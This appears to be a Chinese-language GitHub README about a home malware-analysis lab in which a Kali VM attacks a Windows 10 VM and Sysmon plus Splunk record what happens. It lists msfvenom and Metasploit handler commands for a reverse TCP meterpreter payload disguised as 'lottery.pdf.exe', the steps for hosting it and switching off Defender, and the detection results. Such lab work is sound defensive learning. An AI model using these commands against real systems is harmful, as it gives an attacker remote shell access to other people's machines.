Niharika80/Malware-Behavior-Analysis

# 恶意软件行为分析 本仓库记录了我搭建家庭恶意软件分析实验室的历程，旨在学习和实践防御性安全（Blue Team）。目标是研究恶意代码在执行后的行为，以及 Sysmon + Splunk 等工具如何帮助进行检测和分析。  # 实验环境配置 - **攻击者虚拟机：** Kali Linux - 工具：`msfvenom`、`msfconsole` - **受害者虚拟机：** Windows 10 - 工具：Sysmon、Splunk Enterprise（用于遥测数据收集与分析） # 恶意软件执行步骤 **步骤 1：配置网络** - 确保两台虚拟机（Kali 和 Windows 10）位于同一内部网络中，以维持安全的实验室环境。 **步骤 2：扫描开放端口** - 从 Kali 虚拟机扫描 Windows 虚拟机的开放端口：`nmap -A -Pn`  **步骤 3：创建恶意软件文件** - 使用 msfvenom 生成反向 TCP shell payload： - `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe -o lottery.pdf.exe`  **步骤 4：设置 Exploit 监听器** - 在 Kali 上打开 msfconsole 并配置监听器： - `use exploit/multi/handler` - `set payload windows/meterpreter/reverse_tcp` - `set LHOST ` - `set LPORT 4444` - `exploit`  **步骤 5：托管恶意软件文件** - 在 Kali 上运行 Python HTTP 服务器，以便 Windows 虚拟机下载 payload： - `python3 -m http.server 80`  **步骤 6：禁用 Windows 安全中心** - 在 Windows 虚拟机上，转到“Windows 安全中心”>“病毒和威胁防护”并暂时关闭防护。 **步骤 7：下载并执行恶意软件** - 在 Windows 虚拟机上打开浏览器。 - 输入 URL： - `http://:80/lottery.pdf.exe`  - 运行已下载的 payload。 **步骤 8：验证恶意软件连接** - 在 Windows 虚拟机中，检查活动连接和端口使用情况： - `netstat -anob` **步骤 9：访问 Windows Shell** - 从 Kali 虚拟机中，在 Metasploit 里输入 `shell` 以访问 Windows 命令提示符。 - 运行命令以收集信息（IP、系统信息等）。  **步骤 10：在 Splunk 中分析遥测数据** - 在 Windows 虚拟机上，打开 Splunk 并搜索： - `index=endpoint` - `index=endpoint ` - 检查 Sysmon 日志以查看由恶意软件生成的进程创建、网络连接及其他遥测数据。  **步骤 11：检测到进程创建** - Sysmon 捕获了 lottery.pdf.exe（恶意软件文件）的执行。 - 父进程：lottery.pdf.exe - 生成的子进程：cmd.exe - 这表明恶意软件植入系统后立即启动了命令行 shell，这是一种常见的执行技术。  **步骤 12：追踪命令执行** - 我可以看到恶意软件衍生出 cmd.exe 并运行诸如 net user、net localgroup、ipconfig 等命令。 - 这证实了攻击者正尝试进行侦察和权限操纵。  ## 我的收获： - 学会了在隔离的实验室环境中**安全地执行和分析恶意软件样本**。 - 理解了 **Sysmon 日志**如何提供对系统活动（如进程创建、文件修改和网络连接）的详细洞察。 - 获得了使用 **Splunk** 可视化和检测恶意模式的实践经验。

标签：AMSI绕过, Beacon Object File, CTI, DNS 解析, IP 地址批量处理, Meterpreter, msfvenom, Nmap, OpenCanary, PE 加载器, Sysmon, Windows 10, 威胁检测, 安全实验室, 家庭安全实验室, 恶意代码分析, 搜索语句（dork）, 端点安全, 红队对抗, 网络流量分析, 蓝军防御, 虚拟驱动器, 补丁管理, 逆向TCP Shell, 逆向工具, 配置文件, 防御性安全